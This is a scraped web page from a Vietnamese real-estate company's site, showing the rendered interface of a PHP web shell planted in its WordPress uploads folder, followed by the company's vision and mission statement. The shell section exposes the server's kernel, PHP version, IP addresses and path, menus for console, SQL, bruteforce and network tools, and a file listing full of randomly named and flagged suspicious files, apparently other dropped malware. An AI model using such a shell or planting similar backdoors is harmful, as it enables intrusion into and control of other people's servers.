Uname:
User:
Php:
Hdd:
Cwd:
Linux server26 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 [exploit-db.com]
1000 ( nginx ) Group: 1000 ( ? )
7.0.33 Safe mode: OFF [ phpinfo ] Datetime: 2020-01-25 14:50:38
61.54 GB Free: 9.51 GB (15%)
/home/web/dbvietnam_vn/wp-content/uploads/2019/12/ drwxr-xr-x [ home ]

Server IP:
27.118.22.26
Client IP:
179.43.149.5
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ String tools ][ Bruteforce ][ Network ][ Logout ][ Self remove ]

File manager

NameSizeModifyOwner/GroupPermissionsActions
[ . ]dir2020-01-25 14:43:421000/1000drwxr-xr-xR T
[ .. ]dir2020-01-22 16:04:011000/1000drwxr-xr-xR T
[ agenthandler ]dir2019-12-27 09:41:531000/1000drwxr-xr-xR T
[ auction-go ]dir2020-01-24 10:14:461000/1000drwxr-xr-xR T
[ compositionApi ]dir2019-12-27 09:41:531000/1000drwxr-xr-xR T
[ content ]dir2019-12-27 09:41:471000/1000drwxr-xr-xR T
[ current ]dir2019-12-27 09:41:531000/1000drwxr-xr-xR T
[ default_new ]dir2019-12-27 09:41:471000/1000drwxr-xr-xR T
[ elmar_affiliate ]dir2019-12-27 09:41:471000/1000drwxr-xr-xR T
[ email_editfirm ]dir2019-12-27 09:41:531000/1000drwxr-xr-xR T
[ empfehlen ]dir2020-01-24 13:59:581000/1000drwxr-xr-xR T
[ feedback ]dir2020-01-24 01:13:581000/1000drwxr-xr-xR T
[ fence.inc ]dir2019-12-27 09:41:531000/1000drwxr-xr-xR T
[ function.earlier ]dir2019-12-26 01:40:061000/1000drwxr-xr-xR T
[ function.rod ]dir2019-12-27 09:41:471000/1000drwxr-xr-xR T
[ function.studying ]dir2019-12-28 17:49:011000/1000drwxr-xr-xR T
[ generic_search ]dir2019-12-17 13:27:111000/1000drwxr-xr-xR T
[ init.price ]dir2019-12-27 09:41:471000/1000drwxr-xr-xR T
[ lake.api ]dir2019-12-28 15:18:501000/1000drwxr-xr-xR T
[ meta_tags ]dir2020-01-24 03:13:291000/1000drwxr-xr-xR T
[ mt-comments ]dir2020-01-23 21:55:241000/1000drwxr-xr-xR T
[ overallfooter ]dir2019-12-27 09:41:471000/1000drwxr-xr-xR T
[ physical.inc ]dir2019-12-27 09:41:531000/1000drwxr-xr-xR T
[ popassembly ]dir2019-12-27 09:41:471000/1000drwxr-xr-xR T
[ productlist ]dir2019-09-18 12:12:031000/1000drwxr-xr-xR T
[ profilbasket ]dir2019-12-27 09:41:471000/1000drwxr-xr-xR T
[ quickregcode ]dir2019-12-27 09:41:531000/1000drwxr-xr-xR T
[ registration ]dir2019-12-27 09:41:471000/1000drwxr-xr-xR T
[ rough_api ]dir2019-12-28 16:54:111000/1000drwxr-xr-xR T
[ sitemap_0_5000 ]dir2019-12-27 09:41:531000/1000drwxr-xr-xR T
[ submitart ]dir2020-01-24 09:13:491000/1000drwxr-xr-xR T
[ workshops ]dir2019-12-27 09:41:531000/1000drwxr-xr-xR T
.odvrbf.php.suspected6.19 KB2019-12-16 14:10:591000/1000-rw-r--r--R T E D
1jckJM7.00 MB2019-12-19 16:12:371000/1000-rwxr-xr-xR T E D
1OwHVb0 B2019-12-18 16:44:491000/1000-rwxr-xr-xR T E D
2cb.php26.45 KB2019-12-17 06:50:351000/1000-rw-r--r--R T E D
2RbrSN7.00 MB2019-12-17 08:25:321000/1000-rwxr-xr-xR T E D
5ydzRq7.00 MB2019-12-21 05:54:061000/1000-rwxr-xr-xR T E D
api.jet.php2.55 KB2019-09-29 14:43:461000/1000-rw-r--r--R T E D
barn.func.php.suspected2.29 KB2019-11-17 11:20:411000/1000-rw-r--r--R T E D
cb2.php26.45 KB2019-12-27 07:54:091000/1000-rw-r--r--R T E D
cfgas6.66 MB2020-01-18 09:30:031000/1000-rwxrwxrwxR T E D
ClOiTR7.00 MB2019-12-18 07:47:271000/1000-rwxr-xr-xR T E D
config.fifteen.php.suspected2.62 KB2019-10-25 10:49:371000/1000-rw-r--r--R T E D
er_pan.php434.46 KB2019-12-27 07:54:181000/1000-rw-r--r--R T E D
fenceApi.php.suspected2.64 KB2019-11-24 10:48:191000/1000-rw-r--r--R T E D
function.forgotten.php2.17 KB2019-10-29 14:31:441000/1000-rw-r--r--R T E D
fvC03y7.00 MB2019-12-19 09:23:531000/1000-rwxr-xr-xR T E D
get.php291 B2019-12-27 12:21:551000/1000-r-xr-xr-xR T E D
identityApi.php.suspected1.98 KB2019-11-24 10:44:101000/1000-rw-r--r--R T E D
index.html0 B2020-01-25 14:43:421000/1000-rw-r--r--R T E D
init.division.php2.35 KB2019-09-29 14:27:351000/1000-rw-r--r--R T E D
kLgsF27.00 MB2019-12-17 19:39:211000/1000-rwxr-xr-xR T E D
Km70D47.00 MB2019-12-17 20:05:201000/1000-rwxr-xr-xR T E D
lhkrbi.php6 B2019-09-03 12:21:081000/1000-rw-r--r--R T E D
lkplnr.php6 B2019-06-24 07:37:491000/1000-rwxr-xr-xR T E D
lVCQZX7.00 MB2019-12-16 08:00:311000/1000-rwxr-xr-xR T E D
mh157.31 KB2020-01-25 14:43:421000/1000-rwxrwxrwxR T E D
ncdcab.php7.62 KB2019-12-17 12:11:481000/1000-rw-r--r--R T E D
nhauhl.php6 B2019-01-14 18:56:411000/1000-rw-r--r--R T E D
oq8bQX7.00 MB2019-12-17 19:32:231000/1000-rwxr-xr-xR T E D
pet.config.php.suspected2.32 KB2019-10-18 10:55:381000/1000-rw-r--r--R T E D
pmtwbk.php1.52 KB2019-12-27 11:38:121000/1000-rw-r--r--R T E D
QGhgqm7.00 MB2019-12-19 08:07:081000/1000-rwxr-xr-xR T E D
qkjXTJ7.00 MB2019-12-22 11:57:351000/1000-rwxr-xr-xR T E D
qvlNT57.00 MB2019-12-20 07:26:191000/1000-rwxr-xr-xR T E D
s_eval.php.suspected511 B2019-12-27 07:54:201000/1000-rw-r--r--R T E D
s_noeval.php.suspected491 B2019-12-27 07:54:231000/1000-rw-r--r--R T E D
sbqfxgqhkh.php7.40 KB2019-12-28 14:22:041000/1000-rw-r--r--R T E D
srdzia.php6 B2019-08-07 06:57:381000/1000-rwxr-xr-xR T E D
T25ntN7.00 MB2019-12-22 14:32:191000/1000-rwxr-xr-xR T E D
tbl_geed.php131.05 KB2019-12-27 07:54:271000/1000-rw-r--r--R T E D
title.func.php.suspected2.25 KB2019-09-18 11:31:191000/1000-rw-r--r--R T E D
unYfcC7.00 MB2019-12-17 04:45:441000/1000-rwxr-xr-xR T E D
uvOCqD7.00 MB2019-12-20 08:50:511000/1000-rwxr-xr-xR T E D
wynduc.php6 B2019-05-05 12:30:401000/1000-rwxr-xr-xR T E D
xinl.php1.29 KB2019-12-27 07:54:291000/1000-rw-r--r--R T E D
ylsdsw.php6 B2019-09-05 14:57:021000/1000-rw-r--r--R T E D
yomleq.php6 B2019-11-21 00:13:191000/1000-rwxr-xr-xR T E D
znwmgm.php1.52 KB2019-12-27 11:36:131000/1000-rwxr-xr-xR T E D
zqIuCi0 B2019-12-19 22:23:101000/1000-rwxr-xr-xR T E D
 
Change dir:
Read file:
Make dir: (Writeable)
Make file: (Writeable)
Execute:
Upload file: (Writeable)

Tầm nhìn-sứ mệnh - Công ty Cổ phần Phát triển D&B Việt Nam

Tầm nhìn-sứ mệnh

Đối với một công ty thì Tầm nhìn và sứ mệnh là yếu tố đầu tiên cũng như quan trọng để có thể phát triển lâu dài, để xây dựng phương án cũng như hướng phát triển nói chung.

Tầm nhìn: D&B Việt Nam phấn đấu để đạt được các mục tiêu :

• Trở thành doanh nghiệp đầu tư “Bất động sản đơn lẻ” hàng đầu tại Thủ đô và trung tâm các Thành phố lớn, cung cấp cho Khách hàng các sản phẩm “Đẳng cấp và sự khác biệt” trong lĩnh vực hoạt động.

• Luôn là người dẫn đầu trong lĩnh vực sản xuất kinh doanh, lấy tiêu chí “Khác biệt đến từ sự cụ thể” làm mục tiêu cho mọi công việc từ đầu tư, kinh doanh và quản lý sau đầu tư.

Sứ mệnh: D&B Việt Nam kiên định với các mục tiêu:

• Tạo lập nên những dự án có không gian sống lý tưởng với giá trị tối ưu, góp phần xây dựng diện mạo khu phố văn minh, thân thiện và đáng sống.

• Sự kết hợp giữa giải pháp thiết kế – lựa chọn vật tư thiết bị – biện pháp thi công xây dựng tạo nên “Ngôi nhà trường tồn theo thời gian”.